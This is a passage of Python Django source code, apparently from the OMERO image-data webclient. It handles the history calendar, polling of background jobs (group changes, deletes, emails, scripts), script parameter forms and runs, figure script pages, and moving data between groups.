download_url = download_url + "?" + query
if format is not None:
download_url = (download_url + "&format=%s"
% format)
context = {
'template': "webclient/annotations/download_placeholder.html",
'url': download_url,
'defaultName': defaultName,
'fileLists': fileLists,
'fileCount': fileCount
}
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get('user_id')
if year is not None and month is not None:
controller = BaseCalendar(
conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id)
controller.create_calendar()
context = {'controller': controller}
context['template'] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
""" The data for a particular date that is loaded into the center panel """
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get('page', 1))
filter_user_id = request.session.get('user_id')
controller = BaseCalendar(
conn=conn, year=year, month=month, day=day, eid=filter_user_id)
controller.get_items(page)
context = {'controller': controller}
context['template'] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
S/P, FileAnnotation etc. used to display results from the scripting
service
E.g webclient/userdata/?path=image-12601
If the object is a file annotation, try to browse to the parent P/D/I
"""
base_url = reverse(viewname="load_template", args=['userdata'])
# if we have a File Annotation, then we want our URL to be for the parent
# object...
if isinstance(obj, omero.model.FileAnnotationI):
fa = conn.getObject("Annotation", obj.id.val)
for ptype in ['project', 'dataset', 'image']:
links = list(fa.getParentLinks(ptype))
if len(links) > 0:
obj = links[0].parent
break
if obj.__class__.__name__ in (
"ImageI", "DatasetI", "ProjectI", "ScreenI", "PlateI"):
otype = obj.__class__.__name__[:-1].lower()
base_url += "?show=%s-%s" % (otype, obj.id.val)
return base_url
######################
# Activities window & Progressbar
def update_callback(request, cbString, **kwargs):
"""Update a callback handle with key/value pairs"""
for key, value in kwargs.iteritems():
request.session['callback'][cbString][key] = value
@login_required()
@render_response()
def activities(request, conn=None, **kwargs):
"""
This refreshes callback handles (delete, scripts, chgrp etc) and provides
html to update Activities window & Progressbar.
The returned html contains details for ALL callbacks in web session,
regardless of their status.
We also add counts of jobs, failures and 'in progress' to update status
bar.
"""
in_progress = 0
failure = 0
new_results = []
_purgeCallback(request)
# If we have a jobId, just process that (Only chgrp supported)
jobId = request.GET.get('jobId', None)
if jobId is not None:
jobId = str(jobId)
prx = omero.cmd.HandlePrx.checkedCast(conn.c.ic.stringToProxy(jobId))
rsp = prx.getResponse()
if rsp is not None:
rv = chgrpMarshal(conn, rsp)
rv['finished'] = True
else:
rv = {'finished': False}
return rv
# test each callback for failure, errors, completion, results etc
for cbString in request.session.get('callback').keys():
callbackDict = request.session['callback'][cbString]
job_type = callbackDict['job_type']
status = callbackDict['status']
if status == "failed":
failure += 1
request.session.modified = True
# update chgrp
if job_type == 'chgrp':
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
rsp = prx.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
["%s: %s" % (k, v) for k, v in
rsp.parameters.items()])
logger.error("chgrp failed with: %s"
% rsp_params)
update_callback(
request, cbString,
status="failed",
report="%s %s" % (rsp.name, rsp_params),
error=1)
elif isinstance(rsp, omero.cmd.OK):
update_callback(
request, cbString,
status="finished")
else:
in_progress += 1
finally:
prx.close(close_handle)
except:
logger.info(
"Activities chgrp handle not found: %s" % cbString)
continue
elif job_type == 'send_email':
if status not in ("failed", "finished"):
rsp = None
try:
prx = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
callback = omero.callbacks.CmdCallbackI(
conn.c, prx, foreground_poll=True)
rsp = callback.getResponse()
close_handle = False
try:
# if response is None, then we're still in progress,
# otherwise...
if rsp is not None:
close_handle = True
new_results.append(cbString)
if isinstance(rsp, omero.cmd.ERR):
rsp_params = ", ".join(
["%s: %s" % (k, v)
for k, v in rsp.parameters.items()])
logger.error("send_email failed with: %s"
% rsp_params)
update_callback(
request, cbString,
status="failed",
report={'error': rsp_params},
error=1)
else:
total = (rsp.success + len(rsp.invalidusers) +
len(rsp.invalidemails))
update_callback(
request, cbString,
status="finished",
rsp={'success': rsp.success,
'total': total})
if (len(rsp.invalidusers) > 0 or
len(rsp.invalidemails) > 0):
invalidusers = [
e.getFullName() for e in list(
conn.getObjects(
"Experimenter",
rsp.invalidusers))]
update_callback(
request, cbString,
report={
'invalidusers': invalidusers,
'invalidemails': rsp.invalidemails
})
else:
in_progress += 1
finally:
callback.close(close_handle)
except:
logger.error(traceback.format_exc())
logger.info("Activities send_email handle not found: %s"
% cbString)
# update delete
elif job_type == 'delete':
if status not in ("failed", "finished"):
try:
handle = omero.cmd.HandlePrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
cb = omero.callbacks.CmdCallbackI(
conn.c, handle, foreground_poll=True)
rsp = cb.getResponse()
close_handle = False
try:
if not rsp: # Response not available
update_callback(
request, cbString,
error=0,
status="in progress",
dreport=_formatReport(handle))
in_progress += 1
else: # Response available
close_handle = True
new_results.append(cbString)
rsp = cb.getResponse()
err = isinstance(rsp, omero.cmd.ERR)
if err:
update_callback(
request, cbString,
error=1,
status="failed",
dreport=_formatReport(handle))
failure += 1
else:
update_callback(
request, cbString,
error=0,
status="finished",
dreport=_formatReport(handle))
finally:
cb.close(close_handle)
except Ice.ObjectNotExistException:
update_callback(
request, cbString,
error=0,
status="finished",
dreport=None)
except Exception, x:
logger.error(traceback.format_exc())
logger.error("Status job '%s'error:" % cbString)
update_callback(
request, cbString,
error=1,
status="failed",
dreport=str(x))
failure += 1
# update scripts
elif job_type == 'script':
# if error on runScript, the cbString is not a ProcessCallback...
if not cbString.startswith('ProcessCallback'):
continue # ignore
if status not in ("failed", "finished"):
logger.info("Check callback on script: %s" % cbString)
proc = omero.grid.ScriptProcessPrx.checkedCast(
conn.c.ic.stringToProxy(cbString))
cb = omero.scripts.ProcessCallbackI(conn.c, proc)
# check if we get something back from the handle...
if cb.block(0): # ms.
cb.close()
try:
# we can only retrieve this ONCE - must save results
results = proc.getResults(0, conn.SERVICE_OPTS)
update_callback(request, cbString, status="finished")
new_results.append(cbString)
except Exception, x:
logger.error(traceback.format_exc())
continue
# value could be rstring, rlong, robject
rMap = {}
for key, value in results.items():
v = value.getValue()
if key in ("stdout", "stderr", "Message"):
if key in ('stderr', 'stdout'):
# just save the id of original file
v = v.id.val
update_kwargs = {key: v}
update_callback(request, cbString, **update_kwargs)
else:
if hasattr(v, "id"):
# do we have an object (ImageI,
# FileAnnotationI etc)
obj_data = {
'id': v.id.val,
'type': v.__class__.__name__[:-1]}
obj_data['browse_url'] = getObjectUrl(conn, v)
if v.isLoaded() and hasattr(v, "file"):
# try:
mimetypes = {
'image/png': 'png',
'image/jpeg': 'jpeg',
'text/plain': 'text'}
if v.file.mimetype.val in mimetypes:
obj_data['fileType'] = mimetypes[
v.file.mimetype.val]
obj_data['fileId'] = v.file.id.val
obj_data['name'] = v.file.name.val
# except:
# pass
if v.isLoaded() and hasattr(v, "name"):
# E.g Image, OriginalFile etc
name = unwrap(v.name)
if name is not None:
# E.g. FileAnnotation has null name
obj_data['name'] = name
rMap[key] = obj_data
else:
rMap[key] = v
update_callback(request, cbString, results=rMap)
else:
in_progress += 1
# having updated the request.session, we can now prepare the data for http
# response
rv = {}
for cbString in request.session.get('callback').keys():
# make a copy of the map in session, so that we can replace non
# json-compatible objects, without modifying session
rv[cbString] = copy.copy(request.session['callback'][cbString])
# return json (used for testing)
if 'template' in kwargs and kwargs['template'] == 'json':
for cbString in request.session.get('callback').keys():
rv[cbString]['start_time'] = str(
request.session['callback'][cbString]['start_time'])
rv['inprogress'] = in_progress
rv['failure'] = failure
rv['jobs'] = len(request.session['callback'])
return JsonResponse(rv) # json
jobs = []
new_errors = False
for key, data in rv.items():
# E.g. key: ProcessCallback/39f77932-c447-40d8-8f99-910b5a531a25 -t:tcp -h 10.211.55.2 -p 54727:tcp -h 10.37.129.2 -p 54727:tcp -h 10.12.2.21 -p 54727 # noqa
# create id we can use as html id,
# E.g. 39f77932-c447-40d8-8f99-910b5a531a25
if len(key.split(" ")) > 0:
htmlId = key.split(" ")[0]
if len(htmlId.split("/")) > 1:
htmlId = htmlId.split("/")[1]
rv[key]['id'] = htmlId
rv[key]['key'] = key
if key in new_results:
rv[key]['new'] = True
if 'error' in data and data['error'] > 0:
new_errors = True
jobs.append(rv[key])
jobs.sort(key=lambda x: x['start_time'], reverse=True)
context = {
'sizeOfJobs': len(request.session['callback']),
'jobs': jobs,
'inprogress': in_progress,
'new_results': len(new_results),
'new_errors': new_errors,
'failure': failure}
context['template'] = "webclient/activities/activitiesContent.html"
return context
@login_required()
def activities_update(request, action, **kwargs):
"""
If the above 'action' == 'clean' then we clear jobs from
request.session['callback'] either a single job (if 'jobKey' is specified
in POST) or all jobs (apart from those in progress)
"""
request.session.modified = True
if action == "clean":
if 'jobKey' in request.POST:
jobId = request.POST.get('jobKey')
rv = {}
if jobId in request.session['callback']:
del request.session['callback'][jobId]
request.session.modified = True
rv['removed'] = True
else:
rv['removed'] = False
return JsonResponse(rv)
else:
for key, data in request.session['callback'].items():
if data['status'] != "in progress":
del request.session['callback'][key]
return HttpResponse("OK")
##############################################################################
# User Photo
@login_required()
def avatar(request, oid=None, conn=None, **kwargs):
""" Returns the experimenter's photo """
photo = conn.getExperimenterPhoto(oid)
return HttpResponse(photo, content_type='image/jpeg')
##############################################################################
# webgateway extention
@login_required()
def image_viewer(request, iid, share_id=None, **kwargs):
""" Delegates to webgateway, using share connection if appropriate """
kwargs['viewport_server'] = (
share_id is not None and reverse("webindex")+share_id or
reverse("webindex"))
# remove any trailing slash
kwargs['viewport_server'] = kwargs['viewport_server'].rstrip('/')
return webgateway_views.full_viewer(request, iid, **kwargs)
##############################################################################
# scripting service....
@login_required()
@render_response()
def list_scripts(request, conn=None, **kwargs):
""" List the available scripts - Just officical scripts for now """
scriptService = conn.getScriptService()
scripts = scriptService.getScripts()
# group scripts into 'folders' (path), named by parent folder name
scriptMenu = {}
scripts_to_ignore = request.session.get('server_settings') \
.get('scripts_to_ignore').split(",")
for s in scripts:
scriptId = s.id.val
path = s.path.val
name = s.name.val
fullpath = os.path.join(path, name)
if fullpath in scripts_to_ignore:
logger.info('Ignoring script %r' % fullpath)
continue
# We want to build a hierarchical <ul> <li> structure
# Each <ul> is a {}, each <li> is either a script 'name': <id> or
# directory 'name': {ul}
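        # E.g. scriptMenu ends up like
        # {'omero': {'export_scripts': {'Batch_Image_Export.py': 123}}}
        # (the script id 123 is hypothetical)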
ul = scriptMenu
dirs = fullpath.split(os.path.sep)
for l, d in enumerate(dirs):
if len(d) == 0:
continue
if d not in ul:
# if last component in path:
if l+1 == len(dirs):
ul[d] = scriptId
else:
ul[d] = {}
ul = ul[d]
# convert <ul> maps into lists and sort
def ul_to_list(ul):
dir_list = []
for name, value in ul.items():
if isinstance(value, dict):
# value is a directory
dir_list.append({'name': name, 'ul': ul_to_list(value)})
else:
dir_list.append({'name': name, 'id': value})
dir_list.sort(key=lambda x: x['name'].lower())
return dir_list
scriptList = ul_to_list(scriptMenu)
# If we have a single top-level directory, we can skip it
if len(scriptList) == 1:
scriptList = scriptList[0]['ul']
return scriptList
@login_required()
@render_response()
def script_ui(request, scriptId, conn=None, **kwargs):
"""
Generates an html form for the parameters of a defined script.
"""
scriptService = conn.getScriptService()
try:
params = scriptService.getParams(long(scriptId))
except Exception, ex:
if ex.message.lower().startswith("no processor available"):
return {'template': 'webclient/scripts/no_processor.html',
'scriptId': scriptId}
raise ex
if params is None:
return HttpResponse()
paramData = {}
paramData["id"] = long(scriptId)
paramData["name"] = params.name.replace("_", " ")
paramData["description"] = params.description
paramData["authors"] = ", ".join([a for a in params.authors])
paramData["contact"] = params.contact
paramData["version"] = params.version
paramData["institutions"] = ", ".join([i for i in params.institutions])
inputs = [] # use a list so we can sort by 'grouping'
Data_TypeParam = None
IDsParam = None
for key, param in params.inputs.items():
i = {}
i["name"] = key.replace("_", " ")
i["key"] = key
if not param.optional:
i["required"] = True
i["description"] = param.description
if param.min:
i["min"] = str(param.min.getValue())
if param.max:
i["max"] = str(param.max.getValue())
if param.values:
i["options"] = [v.getValue() for v in param.values.getValue()]
if param.useDefault:
i["default"] = unwrap(param.prototype)
if isinstance(i["default"], omero.model.IObject):
i["default"] = None
pt = unwrap(param.prototype)
if pt.__class__.__name__ == 'dict':
i["map"] = True
elif pt.__class__.__name__ == 'list':
i["list"] = True
if "default" in i:
i["default"] = i["default"][0]
elif isinstance(pt, bool):
i["boolean"] = True
elif isinstance(pt, int) or isinstance(pt, long):
# will stop the user entering anything other than numbers.
i["number"] = "number"
elif isinstance(pt, float):
i["number"] = "float"
# if we got a value for this key in the page request, use this as
# default
if request.GET.get(key, None) is not None:
i["default"] = request.GET.get(key, None)
# E.g "" (string) or [0] (int list) or 0.0 (float)
i["prototype"] = unwrap(param.prototype)
i["grouping"] = param.grouping
inputs.append(i)
if key == "IDs":
IDsParam = i # remember these...
if key == "Data_Type":
Data_TypeParam = i
inputs.sort(key=lambda i: i["grouping"])
# if we have Data_Type param - use the request parameters to populate IDs
if (Data_TypeParam is not None and IDsParam is not None and
"options" in Data_TypeParam):
IDsParam["default"] = ""
for dtype in Data_TypeParam["options"]:
if request.GET.get(dtype, None) is not None:
Data_TypeParam["default"] = dtype
IDsParam["default"] = request.GET.get(dtype, "")
break # only use the first match
# if we've not found a match, check whether we have "Well" selected
if (len(IDsParam["default"]) == 0 and
request.GET.get("Well", None) is not None):
if "Image" in Data_TypeParam["options"]:
wellIds = [long(j) for j in request.GET.get(
"Well", None).split(",")]
wellIdx = 0
try:
wellIdx = int(request.GET.get("Index", 0))
except:
pass
wells = conn.getObjects("Well", wellIds)
imgIds = [str(w.getImage(wellIdx).getId()) for w in wells]
Data_TypeParam["default"] = "Image"
IDsParam["default"] = ",".join(imgIds)
# try to determine hierarchies in the groupings - ONLY handle 1 hierarchy
# level now (not recursive!)
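    # E.g. a param with grouping "03" becomes the parent of any params
    # grouped as "03.1", "03.2" etc.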
for i in range(len(inputs)):
if len(inputs) <= i:
# we may remove items from inputs as we go - need to check
break
param = inputs[i]
grouping = param["grouping"] # E.g 03
param['children'] = list()
while len(inputs) > i+1:
nextGrp = inputs[i+1]["grouping"] # E.g. 03.1
if nextGrp.split(".")[0] == grouping:
param['children'].append(inputs[i+1])
inputs.pop(i+1)
else:
break
paramData["inputs"] = inputs
return {
'template': 'webclient/scripts/script_ui.html',
'paramData': paramData,
'scriptId': scriptId}
@login_required()
@render_response()
def figure_script(request, scriptName, conn=None, **kwargs):
"""
Show a UI for running figure scripts
"""
imageIds = request.GET.get('Image', None) # comma - delimited list
datasetIds = request.GET.get('Dataset', None)
if imageIds is None and datasetIds is None:
return HttpResponse("Need to specify /?Image=1,2 or /?Dataset=1,2")
def validateIds(dtype, ids):
ints = [int(oid) for oid in ids.split(",")]
validObjs = {}
for obj in conn.getObjects(dtype, ints):
validObjs[obj.id] = obj
filteredIds = [iid for iid in ints if iid in validObjs.keys()]
if len(filteredIds) == 0:
raise Http404("No %ss found with IDs %s" % (dtype, ids))
else:
# Now we can specify group context - All should be same group
gid = validObjs.values()[0].getDetails().group.id.val
conn.SERVICE_OPTS.setOmeroGroup(gid)
return filteredIds, validObjs
context = {}
if imageIds is not None:
imageIds, validImages = validateIds("Image", imageIds)
context['idString'] = ",".join([str(i) for i in imageIds])
context['dtype'] = "Image"
if datasetIds is not None:
datasetIds, validDatasets = validateIds("Dataset", datasetIds)
context['idString'] = ",".join([str(i) for i in datasetIds])
context['dtype'] = "Dataset"
if scriptName == "SplitView":
scriptPath = "/omero/figure_scripts/Split_View_Figure.py"
template = "webclient/scripts/split_view_figure.html"
# Lookup Tags & Datasets (for row labels)
imgDict = [] # A list of data about each image.
for iId in imageIds:
data = {'id': iId}
img = validImages[iId]
data['name'] = img.getName()
tags = [ann.getTextValue() for ann in img.listAnnotations()
if ann._obj.__class__ == omero.model.TagAnnotationI]
data['tags'] = tags
data['datasets'] = [d.getName() for d in img.listParents()]
imgDict.append(data)
# Use the first image as a reference
image = validImages[imageIds[0]]
context['imgDict'] = imgDict
context['image'] = image
context['channels'] = image.getChannels()
elif scriptName == "Thumbnail":
scriptPath = "/omero/figure_scripts/Thumbnail_Figure.py"
template = "webclient/scripts/thumbnail_figure.html"
def loadImageTags(imageIds):
tagLinks = conn.getAnnotationLinks("Image", parent_ids=imageIds)
linkMap = {} # group tags. {imageId: [tags]}
tagMap = {}
for iId in imageIds:
linkMap[iId] = []
for l in tagLinks:
c = l.getChild()
if c._obj.__class__ == omero.model.TagAnnotationI:
tagMap[c.id] = c
linkMap[l.getParent().id].append(c)
imageTags = []
for iId in imageIds:
imageTags.append({'id': iId, 'tags': linkMap[iId]})
tags = []
for tId, t in tagMap.items():
tags.append(t)
return imageTags, tags
thumbSets = [] # multiple collections of images
tags = []
figureName = "Thumbnail_Figure"
if datasetIds is not None:
for d in conn.getObjects("Dataset", datasetIds):
imgIds = [i.id for i in d.listChildren()]
imageTags, ts = loadImageTags(imgIds)
thumbSets.append({
'name': d.getName(), 'imageTags': imageTags})
tags.extend(ts)
figureName = thumbSets[0]['name']
else:
imageTags, ts = loadImageTags(imageIds)
thumbSets.append({'name': 'images', 'imageTags': imageTags})
tags.extend(ts)
parent = conn.getObject("Image", imageIds[0]).getParent()
figureName = parent.getName()
context['parent_id'] = parent.getId()
uniqueTagIds = set() # remove duplicates
uniqueTags = []
for t in tags:
if t.id not in uniqueTagIds:
uniqueTags.append(t)
uniqueTagIds.add(t.id)
uniqueTags.sort(key=lambda x: x.getTextValue().lower())
context['thumbSets'] = thumbSets
context['tags'] = uniqueTags
context['figureName'] = figureName.replace(" ", "_")
elif scriptName == "MakeMovie":
scriptPath = "/omero/export_scripts/Make_Movie.py"
template = "webclient/scripts/make_movie.html"
# expect to run on a single image at a time
image = conn.getObject("Image", imageIds[0])
# remove extension (if 3 chars or less)
movieName = image.getName().rsplit(".", 1)
if len(movieName) > 1 and len(movieName[1]) > 3:
movieName = ".".join(movieName)
else:
movieName = movieName[0]
# make sure name is not a path
context['movieName'] = os.path.basename(movieName)
chs = []
for c in image.getChannels():
chs.append({
'active': c.isActive(),
'color': c.getColor().getHtml(),
'label': c.getLabel()
})
context['channels'] = chs
context['sizeT'] = image.getSizeT()
context['sizeZ'] = image.getSizeZ()
scriptService = conn.getScriptService()
scriptId = scriptService.getScriptID(scriptPath)
if (scriptId < 0):
raise AttributeError("No script found for path '%s'" % scriptPath)
context['template'] = template
context['scriptId'] = scriptId
return context
@login_required()
@render_response()
def fileset_check(request, action, conn=None, **kwargs):
"""
Check whether Images / Datasets etc contain partial Multi-image filesets.
Used by chgrp or delete dialogs to test whether we can perform this
'action'.
"""
dtypeIds = {}
for dtype in ("Image", "Dataset", "Project"):
ids = request.GET.get(dtype, None)
if ids is not None:
dtypeIds[dtype] = [int(i) for i in ids.split(",")]
splitFilesets = conn.getContainerService().getImagesBySplitFilesets(
dtypeIds, None, conn.SERVICE_OPTS)
splits = []
for fsId, splitIds in splitFilesets.items():
splits.append({
'id': fsId,
'attempted_iids': splitIds[True],
'blocking_iids': splitIds[False]})
context = {"split_filesets": splits}
context['action'] = action
if action == 'chgrp':
context['action'] = 'move'
context['template'] = ("webclient/activities/"
"fileset_check_dialog_content.html")
return context
def getAllObjects(conn, project_ids, dataset_ids, image_ids, screen_ids,
plate_ids, experimenter_id):
"""
Given a list of containers and images, calculate all the descendants
and necessary siblings (for any filesets)
"""
# TODO Handle None inputs, maybe add defaults
params = omero.sys.ParametersI()
qs = conn.getQueryService()
project_ids = set(project_ids)
dataset_ids = set(dataset_ids)
image_ids = set(image_ids)
fileset_ids = set([])
plate_ids = set(plate_ids)
screen_ids = set(screen_ids)
# Get any datasets for projects
if project_ids:
params.map = {}
params.map['pids'] = rlist([rlong(x) for x in list(project_ids)])
q = '''
select pdlink.child.id
from ProjectDatasetLink pdlink
where pdlink.parent.id in (:pids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
dataset_ids.add(e[0].val)
# Get any plates for screens
if screen_ids:
params.map = {}
params.map['sids'] = rlist([rlong(x) for x in screen_ids])
q = '''
select splink.child.id
from ScreenPlateLink splink
where splink.parent.id in (:sids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
plate_ids.add(e[0].val)
# Get any images for datasets
if dataset_ids:
params.map = {}
params.map['dids'] = rlist([rlong(x) for x in dataset_ids])
q = '''
select dilink.child.id,
dilink.child.fileset.id
from DatasetImageLink dilink
where dilink.parent.id in (:dids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Some images in Dataset may not have fileset
if e[1] is not None:
fileset_ids.add(e[1].val)
# Get any images for plates
# TODO Seemed no need to add the filesets for plates as it isn't possible
# to link it from outside of its plate. This may be true for the client,
# but it certainly isn't true for the model so maybe allow this to also get
# filesets
if plate_ids:
params.map = {}
params.map['plids'] = rlist([rlong(x) for x in plate_ids])
q = '''
select ws.image.id
from WellSample ws
join ws.plateAcquisition pa
where pa.plate.id in (:plids)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any extra images due to filesets
if fileset_ids:
params.map = {}
params.map['fsids'] = rlist([rlong(x) for x in fileset_ids])
q = '''
select image.id
from Image image
left outer join image.datasetLinks dilink
where image.fileset.id in (select fs.id
from Image im
join im.fileset fs
where fs.id in (:fsids)
group by fs.id
having count(im.id)>1)
'''
for e in qs.projection(q, params, conn.SERVICE_OPTS):
image_ids.add(e[0].val)
# Get any additional datasets that may need updating as their children have
# been snatched.
# TODO Need to differentiate which orphaned directories need refreshing
extra_dataset_ids = set([])
extra_orphaned = False
if image_ids:
params.map = {
'iids': rlist([rlong(x) for x in image_ids]),
}
exclude_datasets = ''
if dataset_ids:
params.map['dids'] = rlist([rlong(x) for x in dataset_ids])
# Make sure to allow parentless results as well as those
# that do not match a dataset being removed
exclude_datasets = '''
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
'''
q = '''
select distinct dilink.parent.id
from Image image
left outer join image.datasetLinks dilink
where image.id in (:iids)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:iids)) = 0
''' % exclude_datasets
for e in qs.projection(q, params, conn.SERVICE_OPTS):
if e:
extra_dataset_ids.add(e[0].val)
else:
extra_orphaned = True
# Get any additional projects that may need updating as their children have
# been snatched. There is no need to check for orphans because if a dataset
# is being removed from somewhere else, it can not exist as an orphan.
extra_project_ids = set([])
if dataset_ids:
params.map = {
'dids': rlist([rlong(x) for x in dataset_ids])
}
exclude_projects = ''
if project_ids:
params.map['pids'] = rlist([rlong(x) for x in project_ids])
exclude_projects = 'and pdlink.parent.id not in (:pids)'
q = '''
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
''' % exclude_projects
for e in qs.projection(q, params, conn.SERVICE_OPTS):
extra_project_ids.add(e[0].val)
# We now have the complete list of objects that will change group
# We also have an additional list of datasets/projects that may have had
# snatched children and thus may need updating in the client if the
# dataset/project has gone from N to 0 children
result = {
# These objects are completely removed
'remove': {
'project': list(project_ids),
'dataset': list(dataset_ids),
'screen': list(screen_ids),
'plate': list(plate_ids),
'image': list(image_ids)
},
# These objects now have no children
'childless': {
'project': list(extra_project_ids),
'dataset': list(extra_dataset_ids),
'orphaned': extra_orphaned
}
}
return result
@require_POST
@login_required()
def chgrpDryRun(request, conn=None, **kwargs):
group_id = getIntOrDefault(request, 'group_id', None)
targetObjects = {}
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for dtype in dtypes:
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
targetObjects[dtype] = obj_ids
handle = conn.chgrpDryRun(targetObjects, group_id)
jobId = str(handle)
return HttpResponse(jobId)
@login_required()
def chgrp(request, conn=None, **kwargs):
"""
Moves data to a new group, using the chgrp queue.
Handles submission of chgrp form: all data in POST.
Adds the callback handle to the request.session['callback']['jobId']
"""
# Get the target group_id
group_id = getIntOrDefault(request, 'group_id', None)
if group_id is None:
raise AttributeError("chgrp: No group_id specified")
group_id = long(group_id)
def getObjectOwnerId(r):
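        # Return the owner of the first target object found in the POST data;
        # the chgrp links must be created in that user's context (see below).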
for t in ["Dataset", "Image", "Plate"]:
ids = r.POST.get(t, None)
if ids is not None:
for o in list(conn.getObjects(t, ids.split(","))):
return o.getDetails().owner.id.val
group = conn.getObject("ExperimenterGroup", group_id)
new_container_name = request.POST.get('new_container_name', None)
new_container_type = request.POST.get('new_container_type', None)
container_id = None
# Context must be set to owner of data, E.g. to create links.
ownerId = getObjectOwnerId(request)
conn.SERVICE_OPTS.setOmeroUser(ownerId)
if (new_container_name is not None and len(new_container_name) > 0 and
new_container_type is not None):
conn.SERVICE_OPTS.setOmeroGroup(group_id)
container_id = conn.createContainer(
new_container_type, new_container_name)
# No new container, check if target is specified
if container_id is None:
# E.g. "dataset-234"
target_id = request.POST.get('target_id', None)
container_id = (target_id is not None and target_id.split("-")[1] or
None)
dtypes = ["Project", "Dataset", "Image", "Screen", "Plate"]
for dtype in dtypes:
# Get all requested objects of this type
oids = request.POST.get(dtype, None)
if oids is not None:
obj_ids = [int(oid) for oid in oids.split(",")]
# TODO Doesn't the filesets only apply to images?
# if 'filesets' are specified, make sure we move ALL Fileset Images
fsIds = request.POST.getlist('fileset')
if len(fsIds) > 0:
# If a dataset is being moved and there is a split fileset
# then those images need to go somewhere in the new
if dtype == 'Dataset':
conn.regroupFilesets(dsIds=obj_ids, fsIds=fsIds)
else:
for fs in conn.getObjects("Fileset", fsIds):
obj_ids.extend([i.id for i in fs.copyImages()])
obj_ids = list(set(obj_ids)) # remove duplicates
logger.debug(
"chgrp to group:%s %s-%s" % (group_id, dtype, obj_ids))
handle = conn.chgrpObjects(dtype, obj_ids, group_id, container_id)
jobId = str(handle)
request.session['callback'][jobId] = {
'job_type': "chgrp",
'group': group.getName(),
'to_group_id': group_id,
'dtype': dtype,
'obj_ids': obj_ids,
'job_name': "Change group",
'start_time': datetime.datetime.now(),
'status': 'in progress'}
request.session.modified = True
# Update contains a list of images/containers that need to be
# updated.
project_ids = request.POST.get('Project', [])
dataset_ids = request.POST.get('Dataset', [])
image_ids = request.POST.get('Image', [])
screen_ids = request.POST.get('Screen', [])
plate_ids = request.POST.get('Plate', [])
if project_ids:
project_ids = [long(x) for x in project_ids.split(',')]
if dataset_ids:
dataset_ids = [long(x) for x in dataset_ids.split(',')]
if image_ids:
image_ids = [long(x) for x in image_ids.split(',')]
if screen_ids:
screen_ids = [long(x) for x in screen_ids.split(',')]
if plate_ids:
plate_ids = [long(x) for x in plate_ids.split(',')]
# TODO Change this user_id to be an experimenter_id in the request as it
    # is possible that a user is chgrping data from another user so it is
    # that user's orphaned data that will need updating. Or maybe all orphaned
# directories could potentially need updating?
# Create a list of objects that have been changed by this operation. This
# can be used by the client to visually update.
update = getAllObjects(conn, project_ids, dataset_ids, image_ids,
screen_ids, plate_ids,
request.session.get('user_id'))
# return HttpResponse("OK")
return JsonResponse({'update': update})
@login_required(setGroupContext=True)
def script_run(request, scriptId, conn=None, **kwargs):
"""
Runs a script using values in a POST
"""
scriptService = conn.getScriptService()
inputMap = {}
sId = long(scriptId)
try:
params = scriptService.getParams(sId)
except Exception, x:
if x.message and x.message.startswith("No processor available"):
# Delegate to run_script() for handling 'No processor available'
rsp = run_script(
request, conn, sId, inputMap, scriptName='Script')
return JsonResponse(rsp)
else:
raise
params = scriptService.getParams(sId)
scriptName = params.name.replace("_", " ").replace(".py", "")
logger.debug("Script: run with request.POST: %s" % request.POST)
for key, param in params.inputs.items():
prototype = param.prototype
pclass = prototype.__class__
# handle bool separately, since unchecked checkbox will not be in
# request.POST
if pclass == omero.rtypes.RBoolI:
value = key in request.POST
inputMap[key] = pclass(value)
continue
if pclass.__name__ == 'RMapI':
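            # Map values arrive as indexed pairs of form fields, e.g.
            # "<key>_key0"/"<key>_value0", "<key>_key1"/"<key>_value1", ...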
keyName = "%s_key0" % key
valueName = "%s_value0" % key
row = 0
paramMap = {}
while keyName in request.POST:
# the key and value don't have any data-type defined by
# scripts - just use string
k = str(request.POST[keyName])
v = request.POST[valueName]
if len(k) > 0 and len(v) > 0:
paramMap[str(k)] = v.encode('utf8')
row += 1
keyName = "%s_key%d" % (key, row)
valueName = "%s_value%d" % (key, row)
if len(paramMap) > 0:
inputMap[key] = wrap(paramMap)
continue
if key in request.POST:
if pclass == omero.rtypes.RListI:
values = request.POST.getlist(key)
if len(values) == 0:
continue
if len(values) == 1: # process comma-separated list
if len(values[0]) == 0:
continue
values = values[0].split(",")
# try to determine 'type' of values in our list
listClass = omero.rtypes.RStringI
l = prototype.val # list
# check if a value type has been set (first item of prototype
# list)
if len(l) > 0:
listClass = l[0].__class__
if listClass == int(1).__class__:
listClass = omero.rtypes.rint
if listClass == long(1).__class__:
listClass = omero.rtypes.rlong
# construct our list, using appropriate 'type'
valueList = []
for v in values:
try:
# RStringI() will encode any unicode
obj = listClass(v.strip())
except:
